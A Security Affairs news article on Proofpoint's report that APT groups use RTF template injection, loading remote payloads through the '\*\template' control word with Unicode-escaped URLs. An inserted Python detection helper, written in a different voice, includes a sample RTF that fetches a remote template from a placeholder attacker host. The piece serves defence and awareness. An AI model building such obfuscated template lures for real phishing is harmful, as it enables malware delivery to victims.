Security Affairs

APT

New RTF Template Inject technique used by APT groups in recent attacks


[Figure: RTF template injection technique]

Nation-state actors from China, India, and Russia were spotted using a novel RTF template injection technique in recent attacks.

APT groups from China, India, and Russia have used a new RTF (Rich Text Format) template injection technique in recent phishing attacks.

The technique was first reported by the security firm Proofpoint, which has observed phishing campaigns using weaponized RTF template injection since March 2021. The experts believe that nation-state actors will continue to use the technique in future campaigns.

The RTF template injection technique abuses legitimate RTF template functionality: by subverting the plain-text document formatting properties of the file, it retrieves a malicious payload from a remote server instead of a local file resource via the RTF template control word. The feature abused by attackers allows an RTF template to be loaded from a URL rather than from a local file, so threat actors simply replace a legitimate file destination with a malicious download link.

Experts pointed out that the technique has a lower detection rate among public antivirus engines than the Office-based template injection technique.

“Proofpoint has identified distinct phishing campaigns utilizing the technique which have been attributed to a diverse set of APT threat actors in the wild. While this technique appears to be making the rounds among APT actors in several nations, Proofpoint assesses with moderate confidence, based on the recent rise in its usage and the triviality of its implementation, that it could soon be adopted by cybercriminals as well.” reads the analysis published by Proofpoint.

“By altering an RTF file’s document formatting properties, specifically the document formatting control word for “\*\template” structure, actors can weaponize an RTF file to retrieve remote content by specifying a URL resource instead of an accessible file resource destination.”

In the attacks observed by the researchers, threat actors used Unicode signed character notation to obfuscate the URL value included in the RTF file, in an attempt to evade static detection signatures in antivirus engines.
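As a defender-side illustration of the two points above (a URL in the `\*\template` destination, and the URL hidden behind RTF Unicode escapes), here is an added detection helper that is not part of the Proofpoint report or its YARA rules. It decodes the escapes inside the template destination and flags destinations that are remote; the sample RTF documents, the `.invalid` placeholder host and the extra handling of `\'hh` hex escapes and UNC paths are my own assumptions.

```python
import re

# Constructed samples (not from the Proofpoint report): a minimal RTF whose
# \*\template destination is a URL, partly written as RTF signed 16-bit
# Unicode escapes (\uN?), and a benign one pointing at a local .dotm file.
SUSPICIOUS_RTF = (
    r"{\rtf1\ansi\deff0{\*\template \u104?\u116?\u116?\u112?"
    r"://attacker-placeholder.invalid/remote.dotm}{\fonttbl{\f0 Arial;}}\f0 Hello}"
)
BENIGN_RTF = r"{\rtf1\ansi{\*\template C:\\Templates\\Normal.dotm}Hello}"

# {\*\template <destination>} as described in the report.
TEMPLATE_RE = re.compile(r"\{\\\*\\template\s*(.*?)\}", re.DOTALL)
# RTF text escapes: \uN (signed 16-bit Unicode with optional '?' fallback),
# \'hh (code-page byte, assumed extension) and \\ \{ \} (escaped literals).
ESC_RE = re.compile(r"\\u(-?\d+)\??|\\'([0-9a-fA-F]{2})|\\([\\{}])")
OBFUSCATION_RE = re.compile(r"\\u-?\d+|\\'[0-9a-fA-F]{2}")


def decode_rtf_text(raw):
    """Turn RTF-escaped destination text back into the string Word would use."""
    def sub(m):
        if m.group(1) is not None:
            return chr(int(m.group(1)) & 0xFFFF)   # wrap negative \u values
        if m.group(2) is not None:
            return bytes.fromhex(m.group(2)).decode("cp1252", "replace")
        return m.group(3)
    return ESC_RE.sub(sub, raw).strip()


def is_remote(dest):
    """True for URL schemes (http://, https://, ...) or UNC paths (assumed)."""
    return bool(re.match(r"[a-z][a-z0-9+.\-]*://", dest.lower())) or dest.startswith("\\\\")


def scan_rtf(rtf):
    """List every template destination, whether it is remote, and whether the
    raw bytes used escapes (the static-signature evasion noted in the report)."""
    findings = []
    for m in TEMPLATE_RE.finditer(rtf):
        raw = m.group(1)
        dest = decode_rtf_text(raw)
        findings.append({
            "destination": dest,
            "remote": is_remote(dest),
            "obfuscated": bool(OBFUSCATION_RE.search(raw)),
        })
    return findings


if __name__ == "__main__":
    for name, doc in (("suspicious", SUSPICIOUS_RTF), ("benign", BENIGN_RTF)):
        print(name, scan_rtf(doc))
```

A benign local template yields one finding with `remote` and `obfuscated` both false, so the combination remote-and-obfuscated is the strongest signal to alert on.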

[Figure: RTF template injection technique]

The attack also works with .doc.rtf files opened in Microsoft Word. When an RTF remote template injection file is opened with Word, the application retrieves the resource from the specified URL before displaying the content of the file.

Proofpoint reported that it observed the technique being used by the DoNot Team, Gamaredon, and TA423 APT groups.

[Figure: RTF template injection 2]

“The viability of XML Office based remote template documents has proven that this type of delivery mechanism is a durable and effective method when paired with phishing as an initial delivery vector. The innovation by threat actors to bring this method to a new file type in RTFs represents an expanding surface area of threat for organizations worldwide.” concludes the report. “While this method currently is used by a limited number of APT actors with a range of sophistication, the technique’s effectiveness combined with its ease of use is likely to drive its adoption further across the threat landscape.”

Proofpoint shared YARA signatures for the attacks using this technique.


Pierluigi Paganini

(SecurityAffairs – hacking, RTF template injection)
